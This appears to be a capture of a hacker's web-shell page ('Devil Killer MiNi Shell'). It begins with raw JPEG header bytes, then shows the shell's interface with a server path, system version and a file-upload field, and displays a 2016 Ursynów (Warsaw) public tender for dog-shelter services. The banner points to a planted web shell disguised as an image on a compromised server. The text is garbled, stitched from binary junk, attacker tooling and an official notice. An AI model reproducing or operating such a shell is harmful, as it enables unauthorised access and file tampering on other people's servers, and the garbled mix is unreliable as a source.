JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161212/364669-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.ursynow.pl' target='_blank'>http://www.ursynow.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 364669 - 2016
              z dnia 2016-12-12 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: Świadczenie usług z zakresu prowadzenia przytuliska oraz opieki nad psami bezdomnymi z terenu Dzielnicy Ursynów m.st. Warszawy w 2017 roku, z podziałem na dwa zadania: 
Zadanie 1. - prowadzenie przytuliska oraz opieka nad psami do dziesiątego roku życia
Zadanie 2. - prowadzenie przytuliska oraz opieka nad psami powyżej dziesiątego roku życia.
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto Stołeczne Warszawa Dzielnica Ursynów, krajowy numer identyfikacyjny
              1525964000000, ul.
              al. Komisji Edukacji Narodowej 
              61,
              02777  
              Warszawa, woj.
              mazowieckie, państwo
              Polska, tel.
              22 443 71 01, e-mail
              zam_publ@ursynow.pl, faks
              22 443 71 02.
              <br />
              Adres strony internetowej (URL): www.ursynow.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.ursynow.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.ursynow.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy przesłać na adres Zamawiającego wskazany w pkt. 3.4 SIWZ luz złożyć w siedzibie Zamawiającego przy AL. KEN 61 w Wydziale Obsługi Mieszkańców na parterze, stanowiska 2 lub 3.<br />
                Adres:
                <br />Urząd Dzielnicy Ursynów, AL. KEN 61, 02-777 Warszawa</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Świadczenie usług z zakresu prowadzenia przytuliska oraz opieki nad psami bezdomnymi z terenu Dzielnicy Ursynów m.st. Warszawy w 2017 roku, z podziałem na dwa zadania: 
Zadanie 1. - prowadzenie przytuliska oraz opieka nad psami do dziesiątego roku życia
Zadanie 2. - prowadzenie przytuliska oraz opieka nad psami powyżej dziesiątego roku życia.
<br /><b>Numer referencyjny: </b>KZP-XII-WZP.271.86.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b><br />2<br /><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem niniejszego zamówienia jest świadczenie usług z zakresu prowadzenia przytuliska oraz opieki nad psami bezdomnymi z terenu Dzielnicy Ursynów m.st. Warszawy w 2017 roku, z podziałem na dwa zadania:
Zadanie 1.- prowadzenie przytuliska oraz opieka nad psami do dziesiątego roku życia,
Zadanie 2.- prowadzenie przytuliska oraz opieka nad psami powyżej dziesiątego toku życia. 

DOTYCZY ZADANIA 1

Świadczenie usług z zakresu prowadzenia przytuliska oraz opieki nad psami bezdomnymi z terenu Dzielnicy Ursynów  do dziesiątego roku życia psa

I. Założenia ogólne
Przytulisko powinno znajdować się w odległości nie większej niż 30 km od siedziby Zamawiającego.
Wykonawca powinien zagwarantować ciepłe i suche pomieszczenie wyposażone w budy, boksy lub kojce dla 20-25 psów dużych oraz 5-10 małych i średnich tj. łącznie dla  maksymalnie 30 psów.
Warunkiem prowadzenia przytuliska jest posiadanie dużego placu umożliwiającego:
a.	ustawienie bud, boksów lub kojców w miejscu zadaszonym zapewniającym schronienie psom przed wpływem niekorzystnych warunków atmosferycznych;
b.	zorganizowanie wybiegu dla psów (konieczne jest ogrodzenie);

Zamawiający zastrzega sobie prawo do przeprowadzenia wizji w terenie przed wyborem najkorzystniejszej oferty, w celu sprawdzenia warunków dot. miejsca jakim dysponuje Wykonawca.
Wykonawca musi posiadać tytuł prawny do władania nieruchomością, na której zlokalizowane jest przytulisko lub zgodę właściciela/współwłaściciela nieruchomości na prowadzenie przytuliska na tej posesji.
Osoby prowadzące przytulisko powinny odznaczać się przyjacielskim stosunkiem do zwierząt, a przede wszystkim traktować je humanitarnie.
Na terenie przytuliska zwierzęta muszą czuć się bezpiecznie, a jednocześnie nie mogą zagrażać osobom trzecim. Za szkody wyrządzone przez zwierzęta odpowiada Wykonawca. Urząd nie będzie ingerował w ewentualne nieporozumienia z sąsiadami przytuliska.
Opieka weterynaryjna opłacana jest z budżetu m.st. Warszawy na podstawie rachunku wystawionego przez lecznicę, z którą Dzielnica podpisała umowę. Jeśli choroba psa została spowodowana przez niewłaściwą opiekę lub żywienie, koszty leczenia ponosi Wykonawca.

II. Zadania przytuliska

1.	Przytulisko ma za zadanie przyjmowanie i przetrzymywanie zwierząt wyłapanych na terenie Ursynowa - wyłącznie wskazanych przez WOŚ dla Dzielnicy Ursynów.
2.	Obowiązkiem Wykonawcy jest codzienna pielęgnacja zwierząt i dbanie o czystość otoczenia: 
-	należy codziennie przeglądać pomieszczenia, w których przebywają zwierzęta i na  bieżąco usuwać nieczystości z pomieszczeń, 
-	odświeżać i wymieniać posłania zwierząt, aby zawsze były czyste i suche,
-	zapewnić zwierzętom ruch, codziennie wypuszczać je na wybieg lub wyprowadzać na spacer na smyczy,
-	karmić i pielęgnować zwierzęta zgodnie z zaleceniami lekarza weterynarii, 
-	zwierzęta muszą zawsze mieć dostęp do wody pitnej,
-	o zauważonych u zwierząt objawach chorobowych należy informować Wydział Ochrony Środowiska lub wskazaną przez WOŚ lecznicę weterynaryjną (zlokalizowaną na terenie Dzielnicy Ursynów),
-	u zwierząt chorych należy stosować wskazane przez lekarza leki i zabiegi,
-	Urząd Dzielnicy Ursynów zastrzega sobie prawo do odstąpienia od uporczywego leczenia 
i kontynuowania terapii w przypadku złego rokowania, potwierdzonego opinią lekarza weterynarii.
3.	Minimalny okres pobytu zwierząt w przytulisku wynosi 14 dni (okres kwarantanny), chyba, że wcześniej zgłosi się właściciel. Jeśli w ciągu 14 dni nie znajdzie się właściciel, zwierzę zostanie wysterylizowane i może być oddane do adopcji. 
4.	Wykonawca musi prowadzić rejestr, w którym zostanie zapisana data przyjęcia psa, jego opis (znaki szczególne), płeć.
5.	Kontrolę warunków w jakich przebywają zwierzęta (minimum raz w miesiącu) przeprowadza upoważniony pracownik urzędu Dzielnicy Ursynów. Pozytywny wynik kontroli jest podstawą wypłaty wynagrodzenia dla Wykonawcy.
6.	Obowiązkiem Wykonawcy jest ścisła współpraca z lecznicą weterynaryjną wskazaną przez Dzielnicę Ursynów oraz utrzymywanie stałego kontaktu telefonicznego z Samodzielnym wieloosobowym stanowiskiem ds. zwierząt i edukacji ekologicznej  Wydziału  Ochrony Środowiska.

III. Uwagi końcowe

Za opiekę nad jednym psem Dzielnica Ursynów będzie płacić wynagrodzenie obliczane w oparciu 
o stawkę dzienną (liczba dni pobytu psa w przytulisku w danym okresie rozliczeniowym pomnożona przez zaoferowaną w przetargu cenę za jeden dzień) w zależności od wagi i wielkości psa.
Niewłaściwe obchodzenie się ze zwierzętami spowoduje natychmiastowe rozwiązanie umowy 
z Wykonawcą.
W przypadku zagubienia się psa należy natychmiast zawiadomić Wydział Ochrony Środowiska. Od momentu zagubienia zwierzęcia nie będzie wypłacane wynagrodzenie.

Zamawiający planuje wykorzystać wartość umowy w minimum 90%.

Szczegółowy opis przedmiotu zamówienia określa również formularz cenowy, stanowiący załącznik nr 2a do SIWZ dla Zadania 1 oraz wzór umowy stanowiący załącznik nr 6a do SIWZ dla zadania 1.

DOTYCZY ZADANIA 2

Świadczenie usług z zakresu prowadzenia przytuliska oraz opieki nad psami bezdomnymi z terenu Dzielnicy Ursynów - powyżej dziesiątego roku życia psa
I. Założenia ogólne
Przytulisko powinno znajdować się w odległości nie większej niż 30 km od siedziby Zamawiającego.
Wykonawca powinien zagwarantować ciepłe i suche pomieszczenie wyposażone w budy, boksy lub kojce dla 20-25 psów dużych oraz 5-10 małych i średnich tj. łącznie dla  maksymalnie 30 psów.
Warunkiem prowadzenia przytuliska jest posiadanie dużego placu umożliwiającego:
a.	ustawienie bud, boksów lub kojców w miejscu zadaszonym zapewniającym schronienie psom przed wpływem niekorzystnych warunków atmosferycznych;
b.	zorganizowanie wybiegu dla psów (konieczne jest ogrodzenie);

Zamawiający zastrzega sobie prawo do przeprowadzenia wizji w terenie przed wyborem najkorzystniejszej oferty, w celu sprawdzenia warunków dot. miejsca jakim dysponuje Wykonawca.
Wykonawca musi posiadać tytuł prawny do władania nieruchomością, na której zlokalizowane jest przytulisko lub zgodę właściciela/współwłaściciela nieruchomości na prowadzenie przytuliska na tej posesji.
Osoby prowadzące przytulisko powinny odznaczać się przyjacielskim stosunkiem do zwierząt, a przede wszystkim traktować je humanitarnie.
Na terenie przytuliska zwierzęta muszą czuć się bezpiecznie, a jednocześnie nie mogą zagrażać osobom trzecim. Za szkody wyrządzone przez zwierzęta odpowiada Wykonawca. Urząd nie będzie ingerował w ewentualne nieporozumienia z sąsiadami przytuliska.
Opieka weterynaryjna opłacana jest z budżetu m.st. Warszawy na podstawie rachunku wystawionego przez lecznicę, z którą Dzielnica podpisała umowę. Jeśli choroba psa została spowodowana przez niewłaściwą opiekę lub żywienie, koszty leczenia ponosi Wykonawca.

II. Zadania przytuliska

1.	Przytulisko ma za zadanie przyjmowanie i przetrzymywanie zwierząt wyłapanych na terenie Ursynowa - wyłącznie wskazanych przez WOŚ dla Dzielnicy Ursynów.
2.	Obowiązkiem Wykonawcy jest codzienna pielęgnacja zwierząt i dbanie o czystość otoczenia: 
-	należy codziennie przeglądać pomieszczenia, w których przebywają zwierzęta i na  bieżąco usuwać nieczystości z pomieszczeń, 
-	odświeżać i wymieniać posłania zwierząt, aby zawsze były czyste i suche,
-	zapewnić zwierzętom ruch, codziennie wypuszczać je na wybieg lub wyprowadzać na spacer na smyczy,
-	karmić i pielęgnować zwierzęta zgodnie z zaleceniami lekarza weterynarii, 
-	zwierzęta muszą zawsze mieć dostęp do wody pitnej,
-	o zauważonych u zwierząt objawach chorobowych należy informować Wydział Ochrony Środowiska lub wskazaną przez WOŚ lecznicę weterynaryjną (zlokalizowaną na terenie Dzielnicy Ursynów),
-	u zwierząt chorych należy stosować wskazane przez lekarza leki i zabiegi,
-	Urząd Dzielnicy Ursynów zastrzega sobie prawo do odstąpienia od uporczywego leczenia 
i kontynuowania terapii w przypadku złego rokowania, potwierdzonego opinią lekarza weterynarii.
3.	Minimalny okres pobytu zwierząt w przytulisku wynosi 14 dni (okres kwarantanny), chyba, że wcześniej zgłosi się właściciel. Jeśli w ciągu 14 dni nie znajdzie się właściciel, zwierzę zostanie wysterylizowane i może być oddane do adopcji. 
4.	Wykonawca musi prowadzić rejestr, w którym zostanie zapisana data przyjęcia psa, jego opis (znaki szczególne), płeć.
5.	Kontrolę warunków w jakich przebywają zwierzęta (minimum raz w miesiącu) przeprowadza upoważniony pracownik urzędu Dzielnicy Ursynów. Pozytywny wynik kontroli jest podstawą wypłaty wynagrodzenia dla Wykonawcy.
6.	Obowiązkiem Wykonawcy jest ścisła współpraca z lecznicą weterynaryjną wskazaną przez Dzielnicę Ursynów oraz utrzymywanie stałego kontaktu telefonicznego z Samodzielnym wieloosobowym stanowiskiem ds. zwierząt i edukacji ekologicznej  Wydziału  Ochrony Środowiska.

III. Uwagi końcowe

Za opiekę nad jednym psem Dzielnica Ursynów będzie płacić wynagrodzenie obliczane w oparciu 
o stawkę dzienną (liczba dni pobytu psa w przytulisku w danym okresie rozliczeniowym pomnożona przez zaoferowaną w przetargu cenę za jeden dzień) w zależności od wagi i wielkości psa.
Niewłaściwe obchodzenie się ze zwierzętami spowoduje natychmiastowe rozwiązanie umowy 
z Wykonawcą.
W przypadku zagubienia się psa należy natychmiast zawiadomić Wydział Ochrony Środowiska. Od momentu zagubienia zwierzęcia nie będzie wypłacane wynagrodzenie.

Zamawiający planuje wykorzystać wartość umowy w minimum 90%.

Szczegółowy opis przedmiotu zamówienia określa również formularz cenowy, stanowiący załącznik nr 2b do SIWZ dla Zadania 2 oraz wzór umowy stanowiący załącznik nr 6b do SIWZ dla zadania 2.
<br /><br /><b>II.5) Główny kod CPV: </b>85210000-3<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              206268.29<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców którzy wykażą, że:

 W okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie) wykonał lub wykonuje:

a) DOTYCZY WYKONAWCÓW SKŁADAJĄCYCH OFERTĘ NA ZADANIE 1:
	- co najmniej jedną usługę polegającą na opiece nad co najmniej 20 bezdomnymi zwierzętami. 

b) DOTYCZY WYKONAWCÓW SKŁADAJĄCYCH OFERTĘ NA ZADANIE 2:
- co najmniej jedną usługę polegającą na opiece nad co najmniej 20 bezdomnymi zwierzętami. 

UWAGA!
W przypadku, gdy Wykonawca będzie składał ofertę na dwa Zadania zobowiązany jest wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie) wykonał lub wykonuje, co najmniej jedną usługę polegającą na opiece nad co najmniej 40 bezdomnymi zwierzętami.

 Za wykonaną usługę Zamawiający uzna taką usługę, którą Wykonawca wykonał i której przedmiot został odebrany przez Zamawiającego jako wykonany należycie;
 W przypadku, gdy Wykonawca wykaże się usługą, która jest w toku realizacji tzn. jest wykonywana, Zamawiający uzna warunek za spełniony, jeżeli na dzień składania ofert Wykonawca wykonuje usługę polegającą na opiece:

a)	nad co najmniej 20 bezdomnymi zwierzętami - w przypadku składania oferty tylko na jedno Zadanie, lub
b)	 nad co najmniej 40 bezdomnymi zwierzętami - w przypadku składania oferty na dwa Zadania, i dostarczy potwierdzenie, że usługa wykonywana jest należycie.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Oferta powinna składać się z:
a)	wypełnionego Formularza oferty - wg wzoru określonego w Załączniku nr 1 do SIWZ;
b)	wypełnionego Formularza cenowego wg wzoru określonego odpowiednio w Załączniku nr 2a oraz 2b do SIWZ;
c)	aktualnego na dzień składania ofert oświadczenia Wykonawcy stanowiącego wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego, o treści zgodnej z określoną we wzorze stanowiącym Załącznik nr 3 do SIWZ.
d)	Aktualnego na dzień składania ofert oświadczenia Wykonawcy, stanowiącego wstępne potwierdzenie, że Wykonawca spełnia warunki udziału w postępowaniu odpowiednio w zakresie Zadania 1 oraz Zadania 2 na jakie składa ofertę, o treści zgodnej z określoną we wzorze stanowiącym Załącznik nr 4 do SIWZ.
